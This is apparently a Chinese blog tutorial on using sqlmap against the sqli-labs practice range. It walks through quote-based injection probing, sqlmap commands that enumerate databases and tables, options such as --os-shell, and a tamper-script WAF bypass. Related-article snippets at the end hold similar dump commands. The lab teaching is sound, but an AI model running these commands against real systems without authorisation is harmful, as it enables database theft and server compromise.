渗透测试-SQL注入之sqlmap使用

已于 2022-04-16 13:32:11 修改
阅读量5.5k 收藏 12
点赞数 1
分类专栏: 渗透测试 文章标签: 测试工具 运维开发
于 2022-04-16 13:25:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124210771
版权

SQL注入之sqlmap使用

文章目录

前言

一、sqlmap工具的介绍

SQL注入,一般指web应用程序对用户输入数据的合法性没有校验或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,进行SQL注入攻击获取数据库信息的手段。

sqlmap是kali自带的的SQL注入自动扫描工具,是渗透测试中常用的SQL注入扫描工具,该实验需要下载靶场sqli-labs进行实验练习,通过靶场练习进行讲解。

二、利用sqlmap扫描获取数据库信息

1.sqlmap常用命令

此处为了方便,在window主机上下载了sqlmap工具,哥哥姐姐们可以利用kali自带的使用哦,我这里要下载sqlmap,创建终端方式进行运行,
这里教大家创建。
(1)第一步创建快捷方式
在这里插入图片描述
输入C:\Windows\System32\cmd.exe
点击下一页
在这里插入图片描述
点击完成。
在桌面出现一个cmd.exe的终端命令
右击查看属性
在这里插入图片描述
在起始位置填入你的安装目录。
在这里插入图片描述
创建完成。
点击运行
在这里插入图片描述输入python sqlmap.py
运行成功,接下来开始对网站进行扫描是否存在SQL注入漏洞。
最后总结一些常用的sqlmap命令

–users 列举数据库管理系统中的用户
–is-dba 检测当前用户是否是管理员
–os-shell 模拟一个可以执行任意命令的shell
–os-cmd 执行命令
-current-user 列举当前用户
risk 1风险等级
level 1 检测等级
-proxy =http:// 设置代理
-batch 非交互模式
-p 指定sql 注入点

2.读入数据打开命令行窗口,执行命令,获取数据库信息

输入命令
python sqlmap.py http://192.168.222.4/sqli-labs/Less-1/?id=1 --dbs(查看数据库)
在这里插入图片描述
再输入命令
python sqlmap.py -u http://192.168.222.4/sqli-labs/Less-1/?id=1 -D ok --tables(查看指定数据库中的表)
在这里插入图片描述
在这里插入图片描述
输入命令
python sqlmap.py -r zhian.txt --risk 3 level 3 -p id (扫描是否存在注入)
python sqlmap.py -r zhian.txt --risk 3 level 3(若不知道哪里出现注入,则使用这条语句)
在这里插入图片描述
本次实验进行第一关的练习
下载好phpstudy,将sqli-labs放到www目录下,打开网址
http://localhost/sqli-labs/
在这里插入图片描述
由于之前对网站手工注入发现id号存在注入点
http://192.168.222.4/sqli-labs/Less-1/?id=1
通过加单引号,出现报错
http://192.168.222.4/sqli-labs/Less-1/?id=1’
在这里插入图片描述
加上两个单引号,没有报错,发现存在注入点,放入sqlmap去跑,得到以上开始的结果,从而获取了对方的数据库信息
http://192.168.222.4/sqli-labs/Less-1/?id=1’’
在这里插入图片描述
从结果来看,该网站存在报错注入,联合注入
也可利用temper脚本进行waf绕过

sqlmap绕过waf方法,使用temper脚本
python sqlmap.py -u http://192.168.222.4/sqli-labs/Less-1/?id=1 --tamper=dunion --proxy=http://127.0.0.1:8080
在这里插入图片描述
从结果来看,存在布尔盲注,时间盲注,联合盲注,可以利用数据库等信息获取敏感信息进行拿shell,实验结束。

总结

本次实验简单介绍SQL注入的原理和sqlmap的使用方法,利用sqlmap判断是否存在SQL注入来获取数据库信息的方法,进行了一次简单的SQL注入靶场练习。

炫彩@之星
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqlmap使用详解
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
Web安全攻防的学习——05—(sqlmap检索DBMS信息、sqlmap暴力破解数据、SQL注入原理、SQL注入过程、get基于报错的SQL注入、get基于报错的SQL注入利用)(重点)
weixin_42118531的博客
02-29 2030
1、sqlmap检索DBMS信息 sqlmap检索DBMS banner 获取后端数据库banner信息 参数 --banner或者-b sqlmap检索DBMS当前数据库 获取当前数据库名 参数 --current-db sqlmap检索DBMS当前主机名 获取主机名 参数 --hostname sqlmap检索DBMS用户信息 sqlmap探测当前用DBA 探测当前用户是否是...
使用SQLMap进行SQL注入测试
最新发布
聚娃科技开发者博客
06-28 507
SQL注入是一种常见的Web应用程序安全漏洞,攻击者利用这种漏洞可以执行未经授权的SQL查询,甚至是对数据库的破坏性操作。通过本文,您学习了什么是SQL注入及其危害,以及如何使用SQLMap工具来检测和测试Web应用程序中的SQL注入漏洞。SQLMap是一个自动化的SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它支持多种数据库后端,并提供了强大的测试和利用功能。假设我们有一个简单的Web应用程序,该应用程序使用MySQL数据库,并且存在一个可能受到SQL注入攻击的搜索功能。
sqlmap使用教程(5)-信息获取
fanmeng2008的博客
01-24 1259
渗透测试过程中,信息获取得到数据库名称一般就可以,点到为止,渗透测试的目的是测试系统是否有风险漏洞,而不是为了获取数据库信息!
sqlmap使用
s_daqing的博客
09-03 427
sqlmap -u http://xxxxxxxxxxxx/ShowNews.aspx?Id=746 --smart --batch --tamper=space2comment --user-agent=“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.380...
Sqlmap该如何使用
Cairo_A的博客
04-26 296
伪静态:主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。B: 基于Boolean的盲注(Boolean based blind)(-r:让sqlmap加载post请求,-p:指定注入用的参数)T: 基于时间的盲注(time based blind)U: 联合查询(union query based)Q: 内联查询(inlin queries)S: 栈查询(stack queries)
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
sqlmap中文手册-sql注入自动化测试工具
07-19
它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。该工具是免费开源的,具有广泛的社区支持和持续更新。 SQLMap的...
sql注入攻击之sqlmap
06-10
为了确保网站免受SQL注入攻击,开发者应遵循以下最佳实践:参数化查询或预编译语句的使用,输入验证,限制数据库用户的权限,及时更新数据库软件以修复已知漏洞,以及定期进行安全审计和渗透测试。 总的来说,SQL...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
SQL注入测试工具sqlmap工具
05-14
SQLMap是一款强大的自动化工具,专门用于检测和利用SQL注入漏洞,它广泛应用于Web应用的安全测试和评估。 SQLMap的工作原理主要基于以下几个方面: 1. **探测**:SQLMap通过发送不同类SQL查询到目标应用程序,...
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
SqlMap概述及基础命令参数
YIGAOYU的博客
10-21 879
SqlMap概述及基础命令参数 1.1 任务描述 ​ 如何提高进行SQL注入的效率?利用工具是一个很好的选择。SQLMap就是进行SQL注入的工具。 1.2 课程目标 ➢了解SQLMap的原理、主要特点。 ➢掌握SQLMap的安装。 1.3 SQLMap简介 1.3.1 SQLMap定义 ​ SQLMap是开源的自动化SQL注入工具,由Python写成。它可以自动探测和利用SQL注入漏洞来接管数据库服务器,它配备了一个强大的探测引擎,为最终渗透测试人员提供很多功能,可以访问底层的文件系统,还可以通过带外连接
SQL注入-显错注入Rank 1-Sqlmap
purvispanwu的博客
12-18 3268
网络安全,sqlmap,sql注入
Sqlmap的基本用法
m0_74989372的博客
04-12 898
id=1 -C"username,password" --dump -T users -D security)爆指定数据库的表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆数据库 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆所有表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?用sql注入靶场进行演示。
sqlmap使用(基于dvwa的靶场实验)
weixin_66669317的博客
12-07 1130
sqlmap使用
sqlmap
2202_75317918的博客
05-18 859
sqlmap
Sqlmap
孤的博客
10-18 485
Sqlmap是十分著名的、自动化的SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。 sqlmap采用的SQL注入技术,分别是盲推理SQL注入、UNION查询SQL注入、对查询和基于时间的SQL注入sqlmap功能模块 输入、输出是和用户交互。 ...
sqlmap注入-数据库指令总结
月小白
06-12 1912
今天花了半天的时间安好了python环境和sqlmap,一开始安装的python版本是3,安装好之后再安装了sqlmap,但是按照教程继续进行SQL注入,总是提示sqlmap不是内部命令,几经百度搜索,好像是python版本有问题,于是我又卸载python,重新安装了python2,再次配置环境,终于测试通过,sqlmap能用啦!!!但是,每次想进行sqlmap注入时,总需要输入一些查看数据库或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值